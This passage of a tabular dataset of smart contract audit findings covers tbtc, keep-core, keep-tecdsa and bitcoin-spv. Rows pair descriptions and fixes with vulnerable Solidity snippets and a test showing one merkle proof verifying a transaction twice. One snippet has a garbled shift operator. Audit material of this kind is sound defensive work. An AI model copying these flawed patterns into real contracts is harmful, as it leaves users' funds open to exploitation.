The modified test is below:\\n```\\nit('verifies a bitcoin merkle root', async () => {\\n for (let i = 0; i < verifyHash256Merkle.length; i += 1) {\\n const res = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n verifyHash256Merkle[i].input.index\\n ); // 0-indexed\\n assert.strictEqual(res, verifyHash256Merkle[i].output);\\n\\n // Now, attempt to use the same proof to verify the same leaf at\\n // a different index in the tree:\\n let pLen = verifyHash256Merkle[i].input.proof.length;\\n let height = ((pLen - 2) / 64) - 2;\\n\\n // Only attempt to verify roots that are meant to be verified\\n if (verifyHash256Merkle[i].output && height >= 1) {\\n let altIdx = (2 ** height) + verifyHash256Merkle[i].input.index;\\n\\n const resNext = await instance.verifyHash256Merkle(\\n verifyHash256Merkle[i].input.proof,\\n altIdx\\n );\\n\\n assert.strictEqual(resNext, verifyHash256Merkle[i].output);\\n\\n console.log('Verified transaction twice!');\\n }\\n }\\n});\\n```\\n","Use the length of `_proof` to determine the maximum allowed `_index`. 
`_index` should satisfy the following criterion: `_index` < 2 ** (_proof.length.div(32) - 2).\\nNote that subtraction by 2 accounts for the transaction hash and merkle root, which are assumed to be encoded in the proof along with the intermediate nodes.",,"```\\nuint \_idx = \_index;\\nbytes32 \_root = \_proof.slice(\_proof.length - 32, 32).toBytes32();\\nbytes32 \_current = \_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\_proof.length.div(32)) - 1; i++) {\\n if (\_idx % 2 == 1) {\\n \_current = \_hash256MerkleStep(\_proof.slice(i \* 32, 32), abi.encodePacked(\_current));\\n } else {\\n \_current = \_hash256MerkleStep(abi.encodePacked(\_current), \_proof.slice(i \* 32, 32));\\n }\\n \_idx = \_idx >> 1;\\n}\\nreturn \_current == \_root;\\n```\\n" 
Change the `notUndelegated` check block.number <= `operator.undelegatedAt` || `operator.undelegatedAt` == 0 to `operator.undelegatedAt == 0` as any value being set indicates that undelegation is in progress.\\nEnforce that within the initialization period stake is canceled instead of being undelegated.,,```\\nbool notUndelegated = block.number <= operator.undelegatedAt || operator.undelegatedAt == 0;\\n\\nif (isAuthorized && isActive && notUndelegated) {\\n balance = operator.amount;\\n}\\n```\\n
If `misbehaver.stake` is zero no error might be emitted even though no stake was slashed/seized.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. 
Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n",Require that `minimumStake` has been provided and can be seized/slashed. Update the documentation to reflect the fact that the solution always seizes/slashes `minimumStake`. Ensure that stakers cannot cancel their stake while they are actively participating in the network.,,"```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n\\n/\\*\\*\\n \\* @dev Seize provided token amount from every member in the misbehaved\\n \\* operators array. 
The tattletale is rewarded with 5% of the total seized\\n \\* amount scaled by the reward adjustment parameter and the rest 95% is burned.\\n \\* @param amount Token amount to seize from every misbehaved operator.\\n \\* @param rewardMultiplier Reward adjustment in percentage. Min 1% and 100% max.\\n \\* @param tattletale Address to receive the 5% reward.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction seize(\\n uint256 amount,\\n uint256 rewardMultiplier,\\n address tattletale,\\n address[] memory misbehavedOperators\\n) public onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n uint256 total = misbehavedOperators.length.mul(amount);\\n uint256 tattletaleReward = (total.mul(5).div(100)).mul(rewardMultiplier).div(100);\\n\\n token.transfer(tattletale, tattletaleReward);\\n token.burn(total.sub(tattletaleReward));\\n}\\n```\\n" +keep-tecdsa - Change state-mutability of checkSignatureFraud to view,low,"```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, ""Public key was not set yet"");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n ""Signed digest does not match double sha256 hash of the preimage""\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n ""Signature is not fraudulent""\\n );\\n\\n return true;\\n}\\n```\\n",Declare method as `view`. 
Consider renaming `submitSignatureFraud` to e.g. `checkSignatureFraud` to emphasize that it is only checking the signature and not actually changing state.,,"```\\nfunction submitSignatureFraud(\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s,\\n bytes32 \\_signedDigest,\\n bytes calldata \\_preimage\\n) external returns (bool \\_isFraud) {\\n require(publicKey.length != 0, ""Public key was not set yet"");\\n\\n bytes32 calculatedDigest = sha256(\\_preimage);\\n require(\\n \\_signedDigest == calculatedDigest,\\n ""Signed digest does not match double sha256 hash of the preimage""\\n );\\n\\n bool isSignatureValid = publicKeyToAddress(publicKey) ==\\n ecrecover(\\_signedDigest, \\_v, \\_r, \\_s);\\n\\n // Check if the signature is valid but was not requested.\\n require(\\n isSignatureValid && !digests[\\_signedDigest],\\n ""Signature is not fraudulent""\\n );\\n\\n return true;\\n}\\n```\\n" +keep-core - Specification inconsistency: TokenStaking.slash() is never called,low,"According to the keep specification stake should be slashed if a staker violates the protocol:\\nSlashing If a staker violates the protocol of an operation in a way which can be proven on-chain, they will be penalized by having their stakes slashed.\\nWhile this functionality can only be called by the approved operator contract, it is not being used throughout the system. 
In contrast `seize()` is being called when reporting unauthorized signing or relay entry timeout.\\n```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n",Implement slashing according to the specification.,,"```\\n/\\*\\*\\n \\* @dev Slash provided token amount from every member in the misbehaved\\n \\* operators array and burn 100% of all the tokens.\\n \\* @param amount Token amount to slash from every misbehaved operator.\\n \\* @param misbehavedOperators Array of addresses to seize the tokens from.\\n \\*/\\nfunction slash(uint256 amount, address[] memory misbehavedOperators)\\n public\\n onlyApprovedOperatorContract(msg.sender) {\\n for (uint i = 0; i < misbehavedOperators.length; i++) {\\n address operator = misbehavedOperators[i];\\n require(authorizations[msg.sender][operator], ""Not authorized"");\\n operators[operator].amount = operators[operator].amount.sub(amount);\\n }\\n\\n token.burn(misbehavedOperators.length.mul(amount));\\n}\\n```\\n" +tbtc - Remove notifyDepositExpiryCourtesyCall and allow exitCourtesyCall exiting the courtesy call at term,low,"Following a deep dive into state transitions with the client it was agreed that `notifyDepositExpiryCourtesyCall` should be removed from the system as it is a left-over of a previous version of the deposit 
contract.\\nAdditionally, `exitCourtesyCall` should be callable at any time.\\n```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n",Remove the `notifyDepositExpiryCourtesyCall` state transition and remove the requirement on `exitCourtesyCall` being callable only before the deposit expires.,,"```\\n/// @notice Goes from courtesy call to active\\n/// @dev Only callable if collateral is sufficient and the deposit is not expiring\\n/// @param \\_d deposit storage pointer\\nfunction exitCourtesyCall(DepositUtils.Deposit storage \\_d) public {\\n require(\\_d.inCourtesyCall(), ""Not currently in courtesy call"");\\n require(block.timestamp <= \\_d.fundedAt + TBTCConstants.getDepositTerm(), ""Deposit is expiring"");\\n require(getCollateralizationPercentage(\\_d) >= \\_d.undercollateralizedThresholdPercent, ""Deposit is still undercollateralized"");\\n \\_d.setActive();\\n \\_d.logExitedCourtesyCall();\\n}\\n```\\n" +keep-tecdsa - withdraw should check for zero value transfer,low,"Requesting the withdrawal of zero `ETH` in `KeepBonding.withdraw` should fail as this would allow the method to succeed, calling the user-provided destination even though the sender has no unbonded value.\\n```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n ""Insufficient unbonded value""\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool 
success, ) = destination.call.value(amount)("""");\\n require(success, ""Transfer failed"");\\n}\\n```\\n\\nAnd a similar instance in BondedECDSAKeep:\\n```\\n/// @notice Withdraws amount of ether hold in the keep for the member.\\n/// The value is sent to the beneficiary of the specific member.\\n/// @param \\_member Keep member address.\\nfunction withdraw(address \\_member) external {\\n uint256 value = memberETHBalances[\\_member];\\n memberETHBalances[\\_member] = 0;\\n\\n /\\* solium-disable-next-line security/no-call-value \\*/\\n (bool success, ) = tokenStaking.magpieOf(\\_member).call.value(value)("""");\\n\\n require(success, ""Transfer failed"");\\n}\\n```\\n",Require that the amount to be withdrawn is greater than zero.,,"```\\nfunction withdraw(uint256 amount, address payable destination) public {\\n require(\\n unbondedValue[msg.sender] >= amount,\\n ""Insufficient unbonded value""\\n );\\n\\n unbondedValue[msg.sender] -= amount;\\n\\n (bool success, ) = destination.call.value(amount)("""");\\n require(success, ""Transfer failed"");\\n}\\n```\\n" +tbtc - Signer collusion may bypass increaseRedemptionFee flow,low,"DepositRedemption.increaseRedemptionFee is used by signers to approve a signable bitcoin transaction with a higher fee, in case the network is congested and miners are not approving the lower-fee transaction.\\nFee increases can be performed every 4 hours:\\n```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n\\nIn addition, each increase must increment the fee by exactly the initial proposed fee:\\n```\\n// Check that we're incrementing the fee by exactly the redeemer's initial fee\\nuint256 \\_previousOutputValue = DepositUtils.bytes8LEToUint(\\_previousOutputValueBytes);\\n\\_newOutputValue = DepositUtils.bytes8LEToUint(\\_newOutputValueBytes);\\nrequire(\\_previousOutputValue.sub(\\_newOutputValue) == \\_d.initialRedemptionFee, ""Not an allowed fee 
step"");\\n```\\n\\nOutside of these two restrictions, there is no limit to the number of times `increaseRedemptionFee` can be called. Over a 20-hour period, for example, `increaseRedemptionFee` could be called 5 times, increasing the fee to `initialRedemptionFee * 5`.\\nRather than calling `increaseRedemptionFee` 5 times over 20 hours, colluding signers may immediately create and sign a transaction with a fee of `initialRedemptionFee * 5`, wait for it to be mined, then submit it to `provideRedemptionProof`. Because `provideRedemptionProof` does not check that a transaction signature signs an approved digest, interested parties would need to monitor the bitcoin blockchain, notice the spend, and provide an ECDSA fraud proof before `provideRedemptionProof` is called.","Resolution\\nIssue addressed in keep-network/tbtc#522\\nTrack the latest approved fee, and ensure the transaction in `provideRedemptionProof` does not include a higher fee.",,"```\\nrequire(block.timestamp >= \\_d.withdrawalRequestTime + TBTCConstants.getIncreaseFeeTimer(), ""Fee increase not yet permitted"");\\n```\\n" +tbtc - liquidating a deposit does not send the complete remainder of the contract balance to recipients,low,`purchaseSignerBondsAtAuction` might leave a wei in the contract if:\\nthere is only one wei remaining in the contract\\nthere is more than one wei remaining but the contract balance is odd.\\ncontract balances must be > 1 wei otherwise no transfer is attempted\\nthe division at line 271 floors the result if dividing an odd balance. 
The contract is sending `floor(contract.balance / 2)` to the keep group and liquidationInitiator leaving 1 wei in the contract.\\n```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n,"Define a reasonable minimum amount when awarding the fraud reporter or liquidation initiator. Alternatively, always transfer the contract balance. When splitting the amount use the contract balance after the first transfer as the value being sent to the second recipient. Use the presence of locked funds in a contract as an error indicator unless funds were sent forcefully to the contract.",,```\\nif (contractEthBalance > 1) {\\n if (\\_wasFraud) {\\n initiator.transfer(contractEthBalance);\\n } else {\\n // There will always be a liquidation initiator.\\n uint256 split = contractEthBalance.div(2);\\n \\_d.pushFundsToKeepGroup(split);\\n initiator.transfer(split);\\n }\\n}\\n```\\n +tbtc - approveAndCall unused return parameter,low,"`approveAndCall` always returns false because the return value `bool success` is never set.\\n```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n 
spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n",Return the correct success state.,,"```\\n/// @notice Set allowance for other address and notify.\\n/// Allows `\\_spender` to transfer the specified TDT\\n/// on your behalf and then ping the contract about it.\\n/// @dev The `\\_spender` should implement the `tokenRecipient` interface below\\n/// to receive approval notifications.\\n/// @param \\_spender Address of contract authorized to spend.\\n/// @param \\_tdtId The TDT they can spend.\\n/// @param \\_extraData Extra information to send to the approved contract.\\nfunction approveAndCall(address \\_spender, uint256 \\_tdtId, bytes memory \\_extraData) public returns (bool success) {\\n tokenRecipient spender = tokenRecipient(\\_spender);\\n approve(\\_spender, \\_tdtId);\\n spender.receiveApproval(msg.sender, \\_tdtId, address(this), \\_extraData);\\n}\\n```\\n" +bitcoin-spv - Unnecessary memory allocation in BTCUtils Pending,low,"`BTCUtils` makes liberal use of `BytesLib.slice`, which returns a freshly-allocated slice of an existing bytes array. In many cases, the desired behavior is simply to read a 32-byte slice of a byte array. As a result, the typical pattern used is: `bytesVar.slice(start, start + 32).toBytes32()`.\\nThis pattern introduces unnecessary complexity and memory allocation in a critically important library: cloning a portion of the array, storing that clone in memory, and then reading it from memory. 
A simpler alternative would be to implement `BytesLib.readBytes32(bytes _b, uint _idx)` and other “memory-read” functions.\\nRather than moving the free memory pointer and redundantly reading, storing, then re-reading memory, `readBytes32` and similar functions would perform a simple length check and `mload` directly from the desired index in the array.\\nextractInputTxIdLE:\\n```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n\\nverifyHash256Merkle:\\n```\\nuint \\_idx = \\_index;\\nbytes32 \\_root = \\_proof.slice(\\_proof.length - 32, 32).toBytes32();\\nbytes32 \\_current = \\_proof.slice(0, 32).toBytes32();\\n\\nfor (uint i = 1; i < (\\_proof.length.div(32)) - 1; i++) {\\n if (\\_idx % 2 == 1) {\\n \\_current = \\_hash256MerkleStep(\\_proof.slice(i \\* 32, 32), abi.encodePacked(\\_current));\\n } else {\\n \\_current = \\_hash256MerkleStep(abi.encodePacked(\\_current), \\_proof.slice(i \\* 32, 32));\\n }\\n \\_idx = \\_idx 1;\\n}\\nreturn \\_current == \\_root;\\n```\\n","Implement `BytesLib.readBytes32` and favor its use over the `bytesVar.slice(start, start + 32).toBytes32()` pattern. 
Implement other memory-read functions where possible, and avoid the use of `slice`.\\nNote, too, that implementing this change in `verifyHash256Merkle` would allow `_hash256MerkleStep` to accept 2 `bytes32` inputs (rather than bytes), removing additional unnecessary casting and memory allocation.",,"```\\n/// @notice Extracts the outpoint tx id from an input\\n/// @dev 32 byte tx id\\n/// @param \\_input The input\\n/// @return The tx id (little-endian bytes)\\nfunction extractInputTxIdLE(bytes memory \\_input) internal pure returns (bytes32) {\\n return \\_input.slice(0, 32).toBytes32();\\n}\\n```\\n" +bitcoin-spv - ValidateSPV.validateHeaderChain does not completely validate input Won't Fix,low,"`ValidateSPV.validateHeaderChain` takes as input a sequence of Bitcoin headers and calculates the total accumulated difficulty across the entire sequence. The input headers are checked to ensure they are relatively well-formed:\\n```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n\\nHowever, the function lacks a check for nonzero length of `_headers`. Although the total difficulty returned would be zero, an explicit check would make this more clear.","If `headers.length` is zero, return `ERR_BAD_LENGTH`",,```\\n// Check header chain length\\nif (\\_headers.length % 80 != 0) {return ERR\\_BAD\\_LENGTH;}\\n```\\n +bitcoin-spv - unnecessary intermediate cast,low,"`CheckBitcoinSigs.accountFromPubkey()` casts the `bytes32` keccack256 hash of the `pubkey` to `uint256`, then `uint160` and then finally to `address` while the intermediate cast is not required.\\n```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. 
Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, ""Pubkey must be 64-byte raw, uncompressed key."");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n",The intermediate cast from `uint256` to `uint160` can be omitted. Refactor to `return address(uint256(_digest))` instead.,,"```\\n/// @notice Derives an Ethereum Account address from a pubkey\\n/// @dev The address is the last 20 bytes of the keccak256 of the address\\n/// @param \\_pubkey The public key X & Y. Unprefixed, as a 64-byte array\\n/// @return The account address\\nfunction accountFromPubkey(bytes memory \\_pubkey) internal pure returns (address) {\\n require(\\_pubkey.length == 64, ""Pubkey must be 64-byte raw, uncompressed key."");\\n\\n // keccak hash of uncompressed unprefixed pubkey\\n bytes32 \\_digest = keccak256(\\_pubkey);\\n return address(uint160(uint256(\\_digest)));\\n}\\n```\\n" +bitcoin-spv - unnecessary logic in BytesLib.toBytes32(),low,"The heavily used library function `BytesLib.toBytes32()` unnecessarily casts `_source` to `bytes` (same type) and creates a copy of the dynamic byte array to check it's length, while this can be done directly on the user-provided `bytes` `_source`.\\n```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n","```\\nfunction toBytes32(bytes memory \\_source) pure internal returns (bytes32 result) {\\n if (\\_source.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n }\\n```\\n",,"```\\nfunction toBytes32(bytes memory \\_source) pure internal 
returns (bytes32 result) {\\n bytes memory tempEmptyStringTest = bytes(\\_source);\\n if (tempEmptyStringTest.length == 0) {\\n return 0x0;\\n }\\n\\n assembly {\\n result := mload(add(\\_source, 32))\\n }\\n}\\n```\\n" +bitcoin-spv - redundant functionality Won't Fix,low,"The library exposes redundant implementations of bitcoins double `sha256`.\\nsolidity native implementation with an overzealous type correction issue 5.45\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n\\nassembly implementation\\nNote this implementation does not handle errors when staticcall'ing the precompiled `sha256` contract (private chains).\\n```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev sha2 is precompiled smart contract located at address(2)\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256View(bytes memory \\_b) internal view returns (bytes32 res) {\\n assembly {\\n let ptr := mload(0x40)\\n pop(staticcall(gas, 2, add(\\_b, 32), mload(\\_b), ptr, 32))\\n pop(staticcall(gas, 2, ptr, 32, ptr, 32))\\n res := mload(ptr)\\n }\\n}\\n```\\n","We recommend providing only one implementation for calculating the double `sha256` as maintaining two interfaces for the same functionality is not desirable. 
Furthermore, even though the assembly implementation is saving gas, we recommend keeping the language provided implementation.",,```\\n/// @notice Implements bitcoin's hash256 (double sha2)\\n/// @dev abi.encodePacked changes the return to bytes instead of bytes32\\n/// @param \\_b The pre-image\\n/// @return The digest\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n +bitcoin-spv - unnecessary type correction,low,The type correction `encodePacked().toBytes32()` is not needed as `sha256` already returns `bytes32`.\\n```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n,Refactor to `return sha256(abi.encodePacked(sha256(_b)));` to save gas.,,```\\nfunction hash256(bytes memory \\_b) internal pure returns (bytes32) {\\n return abi.encodePacked(sha256(abi.encodePacked(sha256(\\_b)))).toBytes32();\\n}\\n```\\n +"tbtc - Where possible, a specific contract type should be used rather than address",low,"Rather than storing addresses and then casting to the known contract type, it's better to use the best type available so the compiler can check for type safety.\\n`TBTCSystem.priceFeed` is of type `address`, but it could be type `IBTCETHPriceFeed` instead. 
Not only would this give a little more type safety when deploying new modules, but it would avoid repeated casts throughout the codebase of the form `IBTCETHPriceFeed(priceFeed)`, `IRelay(relay)`, `TBTCSystem()`, and others.\\n```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n\\n```\\ncontract DepositFactory is CloneFactory, TBTCSystemAuthority{\\n\\n // Holds the address of the deposit contract\\n // which will be used as a master contract for cloning.\\n address public masterDepositAddress;\\n address public tbtcSystem;\\n address public tbtcToken;\\n address public tbtcDepositToken;\\n address public feeRebateToken;\\n address public vendingMachine;\\n uint256 public keepThreshold;\\n uint256 public keepSize;\\n```\\n\\nRemediation\\nWhere possible, use more specific types instead of `address`. This goes for parameter types as well as state variable types.",Resolution\\nThis issue has been addressed with https://github.com/keep-network/tbtc/issues/507 and keep-network/tbtc#542.,,```\\nstruct Deposit {\\n\\n // SET DURING CONSTRUCTION\\n address TBTCSystem;\\n address TBTCToken;\\n address TBTCDepositToken;\\n address FeeRebateToken;\\n address VendingMachine;\\n uint256 lotSizeSatoshis;\\n uint8 currentState;\\n uint256 signerFeeDivisor;\\n uint128 undercollateralizedThresholdPercent;\\n uint128 severelyUndercollateralizedThresholdPercent;\\n```\\n +tbtc - Variable shadowing in DepositFactory,low,"`DepositFactory` inherits from `TBTCSystemAuthority`. 
Both contracts declare a state variable with the same name, `tbtcSystem`.\\n```\\naddress public tbtcSystem;\\n```\\n",Remove the shadowed variable.,,```\\naddress public tbtcSystem;\\n```\\n +tbtc - Values may contain dirty lower-order bits Pending,low,"`FundingScript` and `RedemptionScript` use `mload` to cast the first bytes of a byte array to `bytes4`. Because `mload` deals with 32-byte chunks, the resulting `bytes4` value may contain dirty lower-order bits.\\nFundingScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n ""Bad \\_extraData signature. Call must be to unqualifiedDepositToTbtc.""\\n);\\n```\\n\\nRedemptionScript.receiveApproval:\\n```\\n// Verify \\_extraData is a call to tbtcToBtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.tbtcToBtc.selector,\\n ""Bad \\_extraData signature. Call must be to tbtcToBtc.""\\n);\\n```\\n","Solidity truncates these unneeded bytes in the subsequent comparison operations, so there is no action required. However, this is good to keep in mind if these values are ever used for anything outside of strict comparison.",,"```\\n// Verify \\_extraData is a call to unqualifiedDepositToTbtc.\\nbytes4 functionSignature;\\nassembly { functionSignature := mload(add(\\_extraData, 0x20)) }\\nrequire(\\n functionSignature == vendingMachine.unqualifiedDepositToTbtc.selector,\\n ""Bad \\_extraData signature. 
Call must be to unqualifiedDepositToTbtc.""\\n);\\n```\\n" +tbtc - Revert error string may be malformed Pending,low,"`FundingScript` handles an error from a call to `VendingMachine` like so.\\n```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n\\nOn a high-level revert, `returnData` will already include the typical “error selector”. As `FundingScript` propagates this error message, it will add another error selector, which may make it difficult to read the error message.\\nThe same issue is present in RedemptionScript:\\n```\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\_extraData);\\n// By default, `address.call` will catch any revert messages.\\n// Converting the `returnData` to a string will effectively forward any revert messages.\\n// https://ethereum.stackexchange.com/questions/69133/forward-revert-message-from-low-level-solidity-call\\n// TODO: there's some noisy couple bytes at the beginning of the converted string, maybe the ABI-coded length?\\nrequire(success, string(returnData));\\n```\\n","Rather than adding an assembly-level revert to the affected contracts, ensure nested error selectors are handled in external libraries.",,"```\\n// Call the VendingMachine.\\n// We could explictly encode the call to vending machine, but this would\\n// involve manually parsing \\_extraData and allocating variables.\\n(bool success, bytes memory returnData) = address(vendingMachine).call(\\n \\_extraData\\n);\\nrequire(success, string(returnData));\\n```\\n" +"tbtc - Where possible, use constant rather than state variables",low,"`TBTCSystem` uses a state variable for `pausedDuration`, but this value is never changed.\\n```\\nuint256 pausedDuration = 10 
